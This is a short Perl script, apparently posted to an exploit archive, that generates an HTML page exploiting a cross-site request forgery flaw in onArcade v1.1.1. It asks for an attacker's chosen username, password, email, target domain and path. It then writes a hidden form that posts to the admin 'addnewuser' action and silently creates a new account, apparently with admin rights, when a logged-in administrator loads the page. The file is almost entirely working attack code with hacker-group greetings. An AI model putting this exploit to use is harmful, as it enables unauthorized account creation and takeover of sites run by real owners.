#!usr/bin/perl
###################################################
# Title : onArcade v1.1.1 Game CSRF (Cross-Site Request Forgery) Vulnerability
# Software : onArcade Game
# Version : 1.1.1
# Date : n/a
# Author : Or4nG.M4n
# visit : or4ng3m4n.blogspot.com
##################################################
# Start Code
print q(
+----------------------------------------+
| CSRF CREATE YOUR Exploit By 0r4Ng.M4n |
| visit : Or4ng3M4n.BlogSpot.com |
+----------------------------------------+
);
# add Page name For safe Exploit
print "save as :";
$safe=<STDIN>;
# add admin name
print "admin name :";
$ad=<STDIN>;
# add admin pass
print "admin pass :";
$ps=<STDIN>;
# add admin email
print "admin Email :";
$em=<STDIN>;
# add host domain
print "domain :";
$ho=<STDIN>;
# add path script : if you don't add path just Entr
print "path :";
$ph=<STDIN>;
open(CREATE,">>$safe");
print CREATE "
<HTML><HEAD><TITLE>Exploit .. By Or4nG.M4n</TITLE>
<form action='http://$ho/$ph/admin/index.php?action=addnewuser' method='POST' name='form'>
<input type='hidden' value='$ad' name='eusername' ></td>
<input type='hidden' value='$ps' name='euserpassword' ></td>
<input type='hidden' value='$em' name='euseremail' >
<select name='eusergroup'><option value='2'></option></select></td>
<select name='euserstatus'><option value='1'></option></select></td>
<input type='submit' name='submit' value='add' ></td>";
close(CREATE);
print "d0n3\n";
print q(
+---------------------------------------------------+
| # -------------[GreEtz & Thnks]------------- # |
| Greetz : Fox , Lagripe-dz , SarBoT511 , SadHaCkEr |
| i-Hmx , xss mAn , Cyb3r-sA , Dr.TaiGar , h3llc0d3 |
| BiG Thnks : sa^dev!L , Lagripe-dz |
+---------------------------------------------------+
| or4ng3m4n.blogspot.com | sec4ever | v4-team | 7rs |
);
# End Code
